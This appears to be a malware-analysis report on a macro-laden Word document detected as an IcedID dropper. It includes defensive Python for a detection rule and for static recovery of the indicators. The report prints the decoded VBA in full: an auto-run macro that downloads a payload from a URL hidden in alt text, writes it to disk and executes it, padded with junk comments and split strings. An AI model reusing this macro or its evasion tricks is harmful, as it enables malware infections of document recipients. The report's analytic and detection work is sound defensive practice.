Verdict: MALICIOUS (risk score 230)

Heuristics (6)
- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical; CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0.
- VBA project inside OOXML (medium; OOXML_VBA; 3 related findings). The document contains a VBA project, i.e. VBA macros are present.
- CreateObject call (high; OLE_VBA_CREATEOBJ). Matched line in script: Set hYtaT = CreateObject("Script" + AihOg)
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low; OLE_VBA_AUTOOPEN). Matched line in script: Sub AutoOpen()
- Embedded URL (info; EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 URLs below were found in document text (OOXML body / shared strings), and every one is an OOXML/DrawingML XML namespace URI (schemas.microsoft.com, schemas.openxmlformats.org) rather than a network indicator. The macro's actual download URL is not among them: it is stored reversed in the first shape's alternative text and only assembled at run time (see the extracted script below).
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
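The pairing rule above is simple enough to reproduce over any text an analyst can get out of the document: decoded VBA source, p-code disassembly, or a raw string dump of the vbaProject.bin stream. The following is an added example written for this page, not the analyzer's own rule code. It matches the two token classes case-insensitively (VBA identifiers are case-insensitive) and fires only on the pairing. One step goes beyond the rule as described: before matching it folds adjacent string literals joined with + or &, because this sample hides object names by splitting them ("Script" + ..., "ws" + "cript.shell"). Folding only recovers pieces that sit next to each other as literals; on this page the second half of "Scripting.FileSystemObject" arrives through an Optional parameter (AihOg), which a regex pass cannot follow, so the folded names are reported as a bonus, not relied on for the verdict. The sample macros are constructed for the example and are not the extracted source.

```python
import re

# Token sets exactly as listed in the OLE_VBA_PCODE_AUTOEXEC_EXEC description.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")
# Not part of the rule: ProgIDs worth reporting once split literals have been folded.
OBJECT_NAMES = ("Scripting.FileSystemObject", "WScript.Shell", "MSXML2.ServerXMLHTTP")

# "abc" + "def"  or  "abc" & "def"  ->  "abcdef". Doubled quotes ("") inside literals are not handled.
_ADJACENT_LITERALS = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')


def fold_literals(src: str) -> str:
    """Merge adjacent string literals joined by + or & until a fixpoint is reached."""
    while True:
        folded = _ADJACENT_LITERALS.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if folded == src:
            return folded
        src = folded


def find_tokens(text: str, tokens) -> list:
    """Case-insensitive substring match, the way a nocase string rule sees a p-code or string dump.
    VBA is case-insensitive, so 'wscript.shell' must count as WScript.Shell."""
    low = text.lower()
    return [t for t in tokens if t.lower() in low]


def pcode_autoexec_exec(stream_text: str) -> dict:
    """The pairing rule: fire only when an auto-exec entry point AND an execution token co-occur."""
    folded = fold_literals(stream_text)
    autoexec = find_tokens(folded, AUTOEXEC_TOKENS)
    execs = find_tokens(folded, EXEC_TOKENS)
    return {
        "fires": bool(autoexec and execs),
        "autoexec": autoexec,
        "exec": execs,
        "objects": find_tokens(folded, OBJECT_NAMES),   # only visible thanks to folding
    }


# Constructed input in the style of this page's macro; it is not the extracted source.
SAMPLE_MACRO = '''Sub AutoOpen()
    Set fso = CreateObject("Script" + "ing.FileSystemObject")
    Set sh = CreateObject("ws" & "cript.shell")
End Sub
'''
# Constructed negatives: one token class each, so the pairing rule must stay silent.
ONLY_AUTOEXEC = 'Sub Document_Open()\n    MsgBox "hello"\nEnd Sub\n'
ONLY_EXEC = 'Sub Helper()\n    Shell "notepad.exe"\nEnd Sub\n'

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_MACRO),
                       ("only_autoexec", ONLY_AUTOEXEC),
                       ("only_exec", ONLY_EXEC)):
        print(name, pcode_autoexec_exec(text))
```

Substring matching is deliberate: a word-boundary match would miss MSXML2.serverXMLHTTP for the XMLHTTP token and wscript.shell for Shell, at the cost of some noise from comment words. Run it over the olevba output for a document and compare the `objects` list with and without `fold_literals` to see what the split-literal trick hides from a plain token scan.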
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11499 bytes |

SHA-256: 193d62f30d5054bbf24c934e93435de0a4341e40399851e4c156a9956625d5bb

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qlBCv"
Sub ZoSTL(ZMMIG, Optional ByVal LMUIR As String = "c:\programdata\yPWvE.txt", Optional ByVal AihOg As String = "ing.FileSystemObject")
' Dart organs
' Shamelessness anchoring headband
' Month emulated cricketer gaunter
' Birthrate monopolised massacres
' Benders vesting rhetoricians okays
' Beamy revolt lea prussic distastefully proselytising
' Petrifying getable
' Pivoted
' Atrocious extortion
' Advising seaboard interconnection tooting hearttoheart extrapolation juggler
' Acoustical dreading
' Stolid helpfully enquirers lichee
' Localisations
' Secretively
' Ordinary debacles
' Revelation
' Guanaco american splattered capsizing glassy
' Plucker
' Hugging papering pope
Set hYtaT = CreateObject("Script" + AihOg)
' Labouring notification
' Transceiver stopgap donations trombonist
' Executing proximately
' Sightsee sheen
' Bide rands evaporating magnetosphere propionate
' Poising akin enormity pastor notions
' Edema allelic grinder
Set ZPBom = hYtaT.CreateTextFile(LMUIR)
' Husbandry derailed competitors
' Ballbearings esoterically
' Quietening moribundity fumigation
' Depot publicists
' Evilness magazine redheaded
' Unreliably sissy dichotomies severable cahoots
ZPBom.WriteLine ZMMIG
' Dragon discharges inhibitory duchess
' Practitioners ill consents rook
' Extinctions dictionary
' Biometry quash spoonful describe reheated oxymoron
' Collisional subjected suffocating
' Choir
ZPBom.Close
' Smile winded imperative magics
' Inexpedient antrum churning predators
' File derided earth aristocrats
' Admixture geographer waterproof incomprehensible boded
' Moderated vibrationally appellate
' Polysaccharides glares oxidants drainer replicator
' Ejectors parabolas typecast biogeographical gametes heifer
' Openings dealership
' Thieves smarted
' Curtaining
' Scandal circulate duller
' Intoxicated reticulum circlets antiviral carts
' Piffle drills
' Amplification
' Broaden sensitive unnamed
' Bequeath
' Lifelessly southernmost extendability
' Toasted scribing fitments
' Tapered
' Librates corrode serially security uncertainty feature
' Backlight
' Complexion spurns
' Saltier folkish poised agakhan drunkards plural hoaxing
' Cheddar wordgame enchant
' Blueblooded brute shaver tracking contrition housemaid
' Enounced robbery shriekers
' Coauthors
' Cist hostler gatepost
' Crosscountry memorised
' Assignable descriptiveness tripwire addictive cowing
' Malayan enhanced
' Overmuch counterintelligence resounded outermost etching
' Drifters hoeing sign devilled
' Cringing arcana orbitals potable
' Slapped
' Depicts inexhaustibly cockier
' Crimping plosive
' Vaulted punchlines ennobles raves
' Prosecutions slovenliness squander
' Vends
' Rephrased dirtiness incite hairpin tussock surrogates hungrily
End Sub
' Oily wholeness
' Declivity loped ages attainment
' Helixes convalescent eater quickness
' Dispersion
Sub AutoOpen()
' Breathlessness horseshoes insidious muddled illimitable
' Formulae taping painfully govern
' Stylish eddied forenames gunned
' Letterhead rambler
' Scholastic
' Agreeing available henchman stoppers
' Conveniences
' Impasse rips sage
' Glibly lymphocytic
' Opiate instilling
' Unseasonal terraces
' Peregrines south apprehending gatehouse
' Chaffinch guesses pronouncing
' Curie quarrymen hegemony identifiers
' Insulated miserable inveigled
' Sightlessly
' Knitters hic
' Careerism strengthened stead
' Tuck outboard jeans fossa etchings
' Insignificant purl protestantism
' Colouration unbutton superintend well
' Destruct rainforests restorations colonels
' Diffusion diplomats
' Kneads gladioli
' Amateur
Dim QUVsR As New UqPjU
' Loudspeaker bounding candles piety
' Equivocal vacate interrogate middleoftheroad
' Diabetic chiseled
' Satisfies turquoise
' Gritted warranted brazen absences phobias
' Enamelled united cramp depictions batched uploads crayoned
' Piglets mien sniffles
ZMMIG = QUVsR.BRotJ("MSXML2.serverXMLHTTP")
' Acoustical cain yell
' Enclave
' Ordinal disallowed minute unfancied overhauls
' Sponsorship methanol horny normalisations jazz transcendentals
' Angers convalescence pertinaciously
ZoSTL AzDRk(ZMMIG)
' Recordists sterilisation hangglide bodices wand
' Scullery carsick humouring eyetooth
' Technophobia curves despairing farther
' Posed shabbily
' Interlocutor intercepts fluoride
' Negatively
' Metering junk carps rationalistic
' Anisotropy limelight
' Amphora sinking cake wallows
' Disinfectant
' Sociologists buttermilk ferments
KHQmw IPSxZ(0) + "vr32 c:\programdata\yPWvE.txt", "ws"
End Sub
Function uvSyV(csVXt, SKOXB)
' Sectarian desires householder live obstinate honour
' Birthday readings tankage subside bivouacs
' Percussed thump instinctively
' Tunefully tramps
' Pantheon distributes needless
uvSyV = Split(csVXt, SKOXB)
End Function
Attribute VB_Name = "gvXzI"
' Bundling expurgating desertification
' Upholder nuptial
' Greenhorns mindedness
' Acquit autobiographically underground leaked
Function AzDRk(vQzhw)
' Marquess headmaster pert
' Skydive reiteration commit whipper altered
' Volume
' Teethe fascinated casuistry represented
' Bidirectional interrelationship
' Exmember
AzDRk = StrConv(vQzhw, vbUnicode)
' Eigenstates unshockable gustier metallic
' Sunblock velocity senora paediatrics
' Reciprocated
' Mustier cornea pods machete
' Erases serotonin
' Stocks tales flit wellsupported indolent
End Function
' Appellate orders presumptuous inception downy nit
' Lassitude dimers irritation
' Intense fiefdom
' Elm equator
Function nEDVs()
' Quadratures weightiest
' Razes abridged
' Subcontinent impiety terrazzo
' Sighed imputing deify
' Mimicker richness
' Iodide deny loosed backbench discountability
' Supplying degeneracy objectionableness
' Constitutively frequents peptic azimuth
' Screenings buttons whippets
With ActiveDocument.shapes(1)
nEDVs = .AlternativeText
End With
End Function
' Yep detections umlaut instructing
' Layperson echoed
' Views
' Edgeways obscureness dame lingerie cereal
Function IPSxZ(JvWDe)
' Indians chocolates ruminating
' Ding thoroughbreds lisped midriff servitude vigilantly sociobiology
' Revolutionaries
' Faints cowled larks weaken
' Penniless
' Transatlantic
' Combustibles compatriot endeavour parakeet bathtubs
' Shooter baying nonexistence neutered
' Nihilistic vogue push adores
XRqyP = nEDVs()
GCBJK = uvSyV(XRqyP, "###")
Ivacy = GCBJK(JvWDe)
IPSxZ = Ivacy
End Function
Attribute VB_Name = "UqPjU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Summers pretentiously
' Doorknobs subtotals demarcation chockfull
' Alterations creditably
' Lairds slugged mapper chemist moped
' Insipid weakness
Function BRotJ(fonwZ)
' Fakes jaywalker details
' Assures harmonising spawning autumnal
' Gall pensioner
' Steaming vegetables
' Insertion attenuated unprompted landmarks
' Remaindered cashing filaments
Dim gUAgR As Object
' Presumptive croons vaguest controller chins
' Curd
' Cations stairwell
' Immunology relishing igniter
' Governor cyclical item attention trimmer drunken
' Limitless guanine matchmaker breakpoints defrost
' Parched dentine rayon jugglers confirmed injudicious
' Erasures
' Waned replanted
' Herein
' Aluminium fulfils
Set gUAgR = CreateObject(fonwZ)
' Remixed disregarded breakdown anthropoid
' Reassigning draining grasslands whodunnit unsteadily
' Evader satan
' Selfconsciousness
' Wags safer
' Coldish afloat
' Disallows concurrent
' Unpunctuality drawcord decreases fined optimism
' Bucking bores unportable appropriation
' Projectively lauders floozie balsam aloofness northmen
' Cloned numismatics embezzlement
' Learnt repacking
' Jurors
' Wordplay psychological
' Grievously
' Skipping tumulus captivating
' Spat construct equality
' Limeys suicidally
' Overlong salted
' Operator heterodox demoralised twenties vacant
YRPSp = IPSxZ(1)
' Drop disdained policyholders sedition stools malformed
' Detestation teehee
' Favouritism skinniest
' Nail ecologists abandoned asymmetric fencer rancid
' Acapulco
' Shuttlecocks trundling appetising
gUAgR.Open "GET", Reverse(YRPSp), False
' Baulks salaries bedsores prefers
' Fourteenth curlew bisexual
' Offering generously quarterstaffs baubles carnivals
' Jumpiness illtempered whereto unreleasable
gUAgR.Send
' Siberia pyromaniacs offensive
' Kampong garbles bolt
' Entangling swarming blackouts stiffly distressed stigmatised inglorious
' Baptised outperform kalif scrapped
BRotJ = gUAgR.responsebody
End Function
Attribute VB_Name = "GgTNR"
Sub KHQmw(WSamo, buuGY)
' Softie overemphasise coordinates abusively
' Walkout ejecting mnemonically primogeniture
' Girth rehousing
' Dangled sticky enraged impediment
' Bladed surly
' Eclipse
' Subsequently excitation generals
Set udRpu = CreateObject(buuGY + "cript.shell")
' Peroration involvements
' Behaviourist evacuee sleepier wallets individualised
' Orthodoxy directed tantalise
' Thunderclaps satisfies solenoids
' Silica doses jewsharp
' Googly overcoats shortcomings dramatically deafens
' Antediluvian
' Amassing
' Pegs belongings relents chuck mechanicals
' Firms swindled
' Grazed mutilated
' Notably misappropriation
' Dielectric protestant stouter husbands
' Unassociated ignorable impersonator mount
' Honeycombed reddest buddings lettings
' Babysitters leaning beaching reverential unwholesome
' Playfulness neediest
' Wax
' Reordered graduations caked
' Poised loading
' Sensation parsley lectureships
' Sipped tons lousily
' Insensibility park nursery drip
' Suck polytopes instrumented bereavements worship
' Exhibitionists blowup reconsider
' Breadwinner crazed ferny lookingglasses
' Misdealing mildewed attire
' Officialdom intrigue temporality articulated
' Allayed prefixed vacuole recogniser shakable elites
' Animal insulators fencers
' Outlook
' Restyled quaggas hindbrain
' Springboard ascribable
' Harangue adverb eighties lissomeness
' Atonement shamefully nocturnal
' Insinuated diehards bellyful
' Agility
' Liabilities manslaughter enunciate
' Rectitude esthetic
' Bequeathed burned gold chicks morn
' Installer sleight incinerated swabs redrawn
' Sneakiest condones
' Caricaturisation
' Mannequins tranches haemorrhoids telescoped
' Legislate flaunts gatherings halfhearted propel
' Wastings aromatherapist mistrusting
udRpu.exec WSamo
' Embryo
' Zooms chesty griefs
' Endomorphisms wavered vestibule
' Paratroop lolling compere
' Filled biophysical indulging overwhelmed
' Unestablished elderly burbled
' Census monotony
' Disquisitions rushing underpin
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 44032 bytes |

SHA-256: 4762bbc52004d9307318f3339aa350f8a517e30e5608c7fb0d571703e6735295

Detection: ClamAV Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely

This flag should not be read as "no obfuscation": the decoded macro above uses junk comment lines, split string literals ("Script" + AihOg, buuGY + "cript.shell"), a command prefix and a reversed URL read from the first shape's alternative text, and writes the HTTP response body through the FileSystemObject text API after StrConv(..., vbUnicode), a common way to land a binary body as a file. The dropped c:\programdata\yPWvE.txt is that response body, and it is handed to the command assembled from the alt text.
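Because the macro only assembles its command line and URL at run time from ActiveDocument.Shapes(1).AlternativeText, the indicators can be recovered statically without ever running the document. The following is an added example written for this page, not the analyzer's tooling. It assumes the alternative text is stored where Word normally keeps it, the descr attribute of wp:docPr in word/document.xml, and it replays the macro's own string handling: Split on "###", Reverse() of field 1 for the URL, field 0 + "vr32 c:\programdata\yPWvE.txt" for the command (the separator, suffix, drop path and ProgIDs are copied from the extracted script above). The alt text itself is not reproduced in this report, so the script builds a constructed .docx with a placeholder value; the "regs" prefix and the example.com URL in that value are assumptions for illustration only.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML namespace for a drawing's properties; the shape's AlternativeText
# (what ActiveDocument.Shapes(1).AlternativeText returns) is the descr attribute of wp:docPr.
WP_NS = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"

# Values taken from the extracted macro above.
DROP_PATH = r"c:\programdata\yPWvE.txt"   # LMUIR default in ZoSTL and the literal in AutoOpen
SEPARATOR = "###"                         # uvSyV(XRqyP, "###") inside IPSxZ
COMMAND_SUFFIX = "vr32 " + DROP_PATH      # IPSxZ(0) + "vr32 c:\programdata\yPWvE.txt"


def shape_alt_texts(docx) -> list:
    """Return the descr (alternative text) of every wp:docPr in word/document.xml, in document order."""
    with zipfile.ZipFile(docx) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    return [el.get("descr") for el in root.iter(f"{{{WP_NS}}}docPr") if el.get("descr")]


def vba_reverse(text: str) -> str:
    """Mirror the macro's Reverse(): Trim() (VBA trims spaces only), then reverse character by character."""
    return text.strip(" ")[::-1]


def decode_chain(alt_text: str) -> dict:
    """Replay the macro's string handling on one alt-text value without executing anything."""
    parts = alt_text.split(SEPARATOR)
    if len(parts) < 2:
        raise ValueError("alt text does not carry two '###'-separated fields")
    return {
        "url": vba_reverse(parts[1]),                     # gUAgR.Open "GET", Reverse(IPSxZ(1)), False
        "command": parts[0] + COMMAND_SUFFIX,             # KHQmw IPSxZ(0) + "vr32 ...", "ws"
        "launcher": "ws" + "cript.shell",                 # CreateObject(buuGY + "cript.shell"), buuGY = "ws"
        "downloader": "MSXML2.serverXMLHTTP",             # QUVsR.BRotJ("MSXML2.serverXMLHTTP")
        "filesystem": "Script" + "ing.FileSystemObject",  # CreateObject("Script" + AihOg)
        "dropped_file": DROP_PATH,
    }


def recover_iocs(docx) -> dict:
    """The macro reads Shapes(1), so decode the first drawing that carries alternative text."""
    alts = shape_alt_texts(docx)
    if not alts:
        raise ValueError("no drawing with alternative text found")
    return decode_chain(alts[0])


def build_constructed_docx(alt_text: str) -> io.BytesIO:
    """Constructed stand-in for the sample: a minimal .docx whose only drawing carries alt_text.
    This is not the analysed file; it exists so the example runs offline."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        f'xmlns:wp="{WP_NS}"><w:body><w:p><w:r><w:drawing><wp:inline>'
        f'<wp:docPr id="1" name="Picture 1" descr="{alt_text}"/>'
        '</wp:inline></w:drawing></w:r></w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document_xml)
    buf.seek(0)
    return buf


# Constructed alt text: "regs" is an ASSUMED prefix (the report does not show the real value);
# the second field is a reversed placeholder URL, not an indicator from this sample.
CONSTRUCTED_ALT_TEXT = "regs" + SEPARATOR + "moc.elpmaxe.www//:ptth"

if __name__ == "__main__":
    for key, value in recover_iocs(build_constructed_docx(CONSTRUCTED_ALT_TEXT)).items():
        print(f"{key:13} {value}")
```

Point `recover_iocs` at the real .docx path instead of the constructed buffer to get the actual URL and command line. If the document uses a legacy VML shape rather than a DrawingML one, the text lives in the alt attribute of v:shape instead of wp:docPr descr, and Shapes(1) ordering should be confirmed against all alt texts returned rather than assumed.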